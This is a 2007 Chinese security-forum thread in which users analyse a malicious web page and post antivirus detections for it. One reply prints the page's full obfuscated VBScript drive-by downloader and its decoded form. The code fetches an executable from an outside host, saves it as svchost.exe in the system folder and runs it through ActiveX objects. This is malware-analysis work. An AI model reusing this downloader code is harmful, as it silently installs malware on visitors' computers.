收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 kv网页监控病毒
12下一页
返回列表 发新帖
查看: 3641|回复: 13
收起左侧

kv网页监控病毒

[复制链接]
kp2006
头像被屏蔽
发表于 2007-3-8 23:50:27 | 显示全部楼层 |阅读模式
http://www.57cj.com/url.html

[ 本帖最后由 kp2006 于 2007-3-8 23:54 编辑 ]
回复

举报

jlennon
头像被屏蔽
发表于 2007-3-8 23:52:22 | 显示全部楼层
怎么搞滴?先占地?
回复

举报

The EQs
发表于 2007-3-9 00:28:44 | 显示全部楼层
NOD32 antivirus system alert: IMON
Infiltration detected !  

Infiltration details:

   Web page:
   http://www.57cj.com/url.html

   Infiltration:
   HTML/TrojanDownloader.Agent.BW trojan

   Description:
   Access to the web page was blocked by IMON.
回复

举报

小邪邪
发表于 2007-3-9 00:38:01 | 显示全部楼层
打开之后什么都没有,就看见个:Fri Mar 09 00:36:31 2007

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

ly250094040
发表于 2007-3-9 00:50:45 | 显示全部楼层

回复 #4 小邪邪 的帖子

你就不用来了吧

你那规则和一般杀软就没可比性了
回复

举报

jlennon
头像被屏蔽
发表于 2007-3-9 00:55:47 | 显示全部楼层
Fri Mar 09 00:55:39 2007

咖啡的访问保护根本就未被触发。

[ 本帖最后由 jlennon 于 2007-3-9 00:56 编辑 ]
回复

举报

westbeck
发表于 2007-3-9 01:44:50 | 显示全部楼层
网页代码如下:
<SCRIPT language=VBScript>

on error resume next

dl = "http://www.57cj.com/hipdit.exe"

function rechange(k)

s=Split(k,",")

t=""

For i = 0 To UBound(s)

t=t+Chr(eval(s(i)))

Next

rechange=t

End Function

t="58,102,110,97,109,101,49,61,34,115,118,99,104,111,115,116,46,101,120,101,34,13,10,32,122,49,61,34,83,104,101,34,58,122,50,61,34,108,108,46,65,34,58,122,51,61,34,112,112,108,105,34,58,122,52,61,34,99,97,116,34,58,122,53,61,34,105,111,34,58,122,54,61,34,110,34,13,10,32,32,32,32,122,122,61,122,49,38,122,50,38,122,51,38,122,52,38,122,53,38,122,54,13,10,32,32,32,32,115,117,98,32,115,104,101,108,108,101,120,101,40,122,122,44,102,110,97,109,101,49,41,13,10,32,32,32,32,32,115,101,116,32,81,32,61,32,100,102,46,99,114,101,97,116,101,111,98,106,101,99,116,40,122,122,44,34,34,41,58,81,46,83,104,101,108,108,69,120,101,99,117,116,101,32,102,110,97,109,101,49,44,34,34,44,34,34,44,34,111,112,101,110,34,44,48,13,10,32,32,101,110,100,32,115,117,98,13,10,32,32,32,32,116,49,61,34,99,108,115,105,100,58,34,58,116,50,61,34,66,68,57,54,67,53,53,54,45,34,58,116,51,61,34,54,53,65,51,45,34,58,116,52,61,34,49,49,68,48,45,34,58,116,53,61,34,57,56,51,65,45,34,58,116,54,61,34,48,48,67,48,52,70,67,50,57,69,51,54,34,13,10,32,32,32,32,116,55,61,116,49,38,116,50,38,116,51,38,116,52,38,116,53,38,116,54,13,10,32,32,32,32,83,101,116,32,100,102,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,111,98,106,101,99,116,34,41,13,10,32,32,32,32,100,102,46,115,101,116,65,116,116,114,105,98,117,116,101,32,34,99,108,97,115,115,105,100,34,44,32,116,55,13,10,32,32,32,32,98,52,61,34,77,105,34,58,98,53,61,34,99,114,34,58,98,54,61,34,111,34,58,98,55,61,34,115,111,102,116,34,58,98,56,61,34,46,88,34,58,98,57,61,34,77,34,58,98,49,48,61,34,76,34,58,98,49,49,61,34,72,34,58,98,49,50,61,34,84,34,58,98,49,51,61,34,84,34,58,98,49,52,61,34,80,34,13,10,32,32,32,32,115,116,114,98,61,98,52,38,98,53,38,98,54,38,98,55,38,98,56,38,98,57,38,98,49,48,38,98,49,49,38,98,49,50,38,98,49,51,38,98,49,52,13,10,32,32,32,32,83,101,116,32,120,32,61,32,100,102,46,67,114,101,97,116,101,79,98,106,101,99,116,40,115,116,114,98,44,34,34,41,13,10,32,32,32,32,97,52,61,34,65,34,58,97,53,61,34,100,34,58,97,54,61,34,111,34,58,97,55,61,34,100,34,58,97,56,61,34,98,34,58,97,57,61,34,46,34,58,97,49,48,61,34,83,34,58,97,49,49,61,34,116,34,58,97,49,50,61,34,114,34,58,97,49,51,61,34,101,34,58,97,49,52,61,34,97,34,58,97,49,53,61,34,109,34,13,10,32,32,32,32,115,116,114,100,61,97,52,38,97,53,38,97,54,38,97,55,38,97,56,38,97,57,38,97,49,48,38,97,49,49,38,97,49,50,38,97,49,51,38,97,49,52,38,97,49,53,13,10,32,32,32,32,115,101,116,32,83,83,32,61,32,100,102,46,99,114,101,97,116,101,111,98,106,101,99,116,40,115,116,114,100,44,34,34,41,13,10,32,32,32,32,83,83,46,116,121,112,101,32,61,32,49,13,10,32,32,32,32,102,52,61,34,71,34,58,102,53,61,34,69,34,58,102,54,61,34,84,34,13,10,32,32,32,32,115,116,114,101,61,102,52,38,102,53,38,102,54,13,10,32,13,10,32,32,32,32,120,46,79,112,101,110,32,115,116,114,101,44,32,100,108,44,32,70,97,108,115,101,13,10,32,32,32,32,120,46,83,101,110,100,13,10,32,32,32,32,13,10,32,32,32,32,115,101,116,32,70,32,61,32,100,102,46,99,114,101,97,116,101,111,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,44,34,34,41,13,10,32,32,32,32,116,109,112,50,61,50,13,10,32,32,32,32,115,101,116,32,116,109,112,32,61,32,70,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,116,109,112,50,41,13,10,32,32,32,32,83,83,46,111,112,101,110,13,10,32,32,32,32,102,110,97,109,101,49,61,32,70,46,66,117,105,108,100,80,97,116,104,40,116,109,112,44,102,110,97,109,101,49,41,13,10,32,32,32,32,83,83,46,119,114,105,116,101,32,120,46,114,101,115,112,111,110,115,101,66,111,100,121,13,10,32,32,32,32,83,83,46,115,97,118,101,116,111,102,105,108,101,32,102,110,97,109,101,49,44,50,13,10,32,32,32,32,83,83,46,99,108,111,115,101,13,10,32,99,97,108,108,32,115,104,101,108,108,101,120,101,40,122,122,44,102,110,97,109,101,49,41"

i=t

execute(rechange(I))

</SCRIPT><script type="text/jscript">function init() { document.write(Date());}window.onload = init;</script>

</HEAD>

<BODY></BODY></HTML>
其中对t的值加密,十进制解密得到:
:fname1="svchost.exe"
z1="She":z2="ll.A":z3="ppli":z4="cat":z5="io":z6="n"
    zz=z1&z2&z3&z4&z5&z6
    sub shellexe(zz,fname1)
     set Q = df.createobject(zz,""):Q.ShellExecute fname1,"","","open",0
  end sub
    t1="clsid:":t2="BD96C556-":t3="65A3-":t4="11D0-":t5="983A-":t6="00C04FC29E36"
    t7=t1&t2&t3&t4&t5&t6
    Set df = document.createElement("object")
    df.setAttribute "classid", t7
    b4="Mi":b5="cr":b6="o":b7="soft":b8=".X":b9="M":b10="L":b11="H":b12="T":b13="T":b14="P"
    strb=b4&b5&b6&b7&b8&b9&b10&b11&b12&b13&b14
    Set x = df.CreateObject(strb,"")
    a4="A":a5="d":a6="o":a7="d":a8="b":a9=".":a10="S":a11="t":a12="r":a13="e":a14="a":a15="m"
    strd=a4&a5&a6&a7&a8&a9&a10&a11&a12&a13&a14&a15
    set SS = df.createobject(strd,"")
    SS.type = 1
    f4="G":f5="E":f6="T"
    stre=f4&f5&f6

    x.Open stre, dl, False
    x.Send
   
    set F = df.createobject("Scripting.FileSystemObject","")
    tmp2=2
    set tmp = F.GetSpecialFolder(tmp2)
    SS.open
    fname1= F.BuildPath(tmp,fname1)
    SS.write x.responseBody
    SS.savetofile fname1,2
    SS.close
call shellexe(zz,fname1)
一段VBScript脚本,功能是调用自定义函数,对变量t的值进行解密并调用execute()执行。
解密后的代码是VBScript脚本代码,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件http://www.57cj.com/hipdit.exe,并利用Shell.Application 对象Q 的 ShellExecute 方法 来运行。
hipdit.exe 卡巴报:Trojan-Clicker.Win32.Flyst.d
回复

举报

zengmingwh
发表于 2007-3-9 09:50:33 | 显示全部楼层
Virus or unwanted program 'HTML/MultiHtExp.3'
detected in file 'C:\url.html.nv!' [HTML/MultiHtExp.3].
回复

举报

jimmyleo
发表于 2007-3-9 10:10:02 | 显示全部楼层
[WARNING] Is the Trojan horse TR/Drop.Lmir.D.3!
回复

举报

鼻耳盖子
发表于 2007-3-9 11:11:27 | 显示全部楼层
我这好象打不开
回复

举报

下一页 »
12下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-25 15:12 , Processed in 0.133265 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表